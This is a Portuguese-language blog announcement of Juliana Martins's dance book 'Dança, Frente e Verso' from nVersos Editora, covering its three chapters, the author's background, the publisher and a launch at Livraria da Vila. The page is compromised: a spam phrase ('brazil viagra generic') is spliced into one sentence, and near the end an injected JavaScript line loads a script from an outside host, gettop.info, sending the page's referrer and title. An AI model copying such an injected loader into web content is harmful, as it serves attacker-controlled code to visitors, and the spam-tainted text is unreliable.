LateralNotíciaSão Paulo

“Dança, frente e verso” – Juliana Martins – lançamento

Reflexões sobre repertório de Juliana Martins constituem a base de “Dança, Frente e Verso”, lançamento da nVersos Editora

 

Obra é resultado de estudos e experiências pessoais da pesquisadora, que revive processos, a fim de compreendê-los. “… Não existe absolutamente nada de natural aqui, tudo foi construído aos poucos, até mesmo cada letra e espaço que digito. Sou uma bailarina escrevendo e tentando não me entediar em frente à tela. Sinto meu quadril alargar-se a cada hora que movo somente meus dedos […] é a vida que mexe muito enquanto as páginas se acumulam” – Juliana Martins – Bailarina, coreógrafa e escritora

 

.
.

Não há como deixar de se hipnotizar diante da execução de uma dança. Nesse momento, nada ao redor parece se mover a não ser quem percorre o palco com gentileza e perfeição. É assim que se nota a dança enquanto linguagem do corpo e, mais do que isso, o discurso da alma em rima coreográfica. Juliana Martins, bailarina e coreógrafa, utiliza-se deste tema para a construção de Dança, Frente e Verso, lançamento da nVersos, no qual revela a importância dessa arte em sua formação e também no cenário artístico mais abrangente.

A autora imerge nas chamadas artes performáticas, tais como a dança e o teatro, e a vocação destas linguagens para a criação de objetos artísticos que, terminados, continuam somente na memória dos espectadores e dos artistas, dada sua fugacidade aos registros físicos. Concluindo essa lógica, a perda é um dos elementos essenciais destas artes, sobretudo a dança, traçando um paralelo direto com o elemento presente na concepção da morte. Ao recriar por meio da escrita, a autora une tais formas efêmeras à palavra impressa para apresentar aos leitores uma visita às anotações do seu passado, uma reflexão sobre o presente nas suas criações e apresentações, e, por fim, um pensamento acerca do futuro.

Nesse prisma, Dança, Frente e Verso é uma síntese dos estudos, das experiências e também das ideias que fluem em conversas com amigos e alunos, os quais a autora confessa serem tão caros quanto os conceitos dos livros. Utilizando informações brazil viagra generic pessoais, trechos de diários antigos, entrevistas, poemas, notas feitas em livros de estudos e lembranças (tudo isso sem deixar a obra se tornar um diário pessoal), a autora mantém o foco na produção em dança do começo ao fim, dada a complexidade temática e os elementos de suas análises.

Nos quatro anos de aperfeiçoamento da obra, Juliana escreveu palavras mais próximas do coração, do cérebro e/ou do estômago. O livro está dividido em três capítulos. No primeiro, a autora se debruça na teoria de Rudolf Laban acerca da harmonia e como ela funciona no auxílio para afinar olhos e corpos. No segundo capítulo, a autora pega por empréstimo de Mark Johnson o entendimento de que existem obras cênicas que se desdobram para a percepção do espectador estável, e outras que se colocam mais estáveis e demandam que o espectador passeie por elas. Ainda no segundo capítulo, apresenta a teoria própria do espectador-refém. No terceiro e último capítulo, a obra ganha ares psicológicos com reflexões sobre a dramaturgia do in/consciente, um paralelo com conceitos de psicanálise (principalmente Freud) sobre a repetição e as operações do inconsciente.

 

FICHA TÉCNICA

Editora: nVersos
ISBN: 978-85-64013-82-7
Páginas: 203

 

Juliana Martins Rodrigues de Moraes

Bailarina, coreógrafa, doutora e bacharel em Dança na Unicamp. Realizou especialização e mestrado no Laban Centre, em Londres, e é professora do Centro Universitário Belas Artes de São Paulo, além de lecionar como professora convidada da Scuola Teatro Dimitri, em Versio (Suíça). Também é diretora da Companhia Perdida, fundada com o objetivo de viabilizar um espaço para a pesquisa de poéticas coreográficas em parceria com outros criadores-intérpretes e para a realização de espetáculos em grupo.

 

Editora nVersos

Criada em 2011, em São Paulo, a nVersos Editora surgiu para explorar novos processos e segmentos de produção de conhecimento não alinhados ao mercado convencional, além de divulgar a pluralidade. Segundo seus fundadores, nessa sua proposta de atuar à luz de uma “literatura do desvio” a empresa dirige seu foco tanto para os textos tradicionais como para os resultantes de distintas convergências. Ao contemplar este universo, a nVersos não apenas valoriza, mas também leva ao mercado uma linha editorial sem fronteiras e sem abordagens preestabelecidas. Graças a esse largo espectro de busca e identificação de autores com as mais diversas propostas, a editora reafirma, constantemente, sua disposição de participar da formação de um imaginário capaz de contribuir para a compreensão da complexidade do mundo contemporâneo a partir de diferentes análises e leituras.

Contatos nVersos Editora:
Vendas – vendas@nversos.com.br
Editorial – nversos@nversos.com.br
Telefone – (11) 3589-5390

 

SERVIÇO

 

Lançamento na Livraria da Vila –
Rua Fradique Coutinho, 915 – Pinheiros

Dia 11.12, das 19 às 20h.

 

 

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.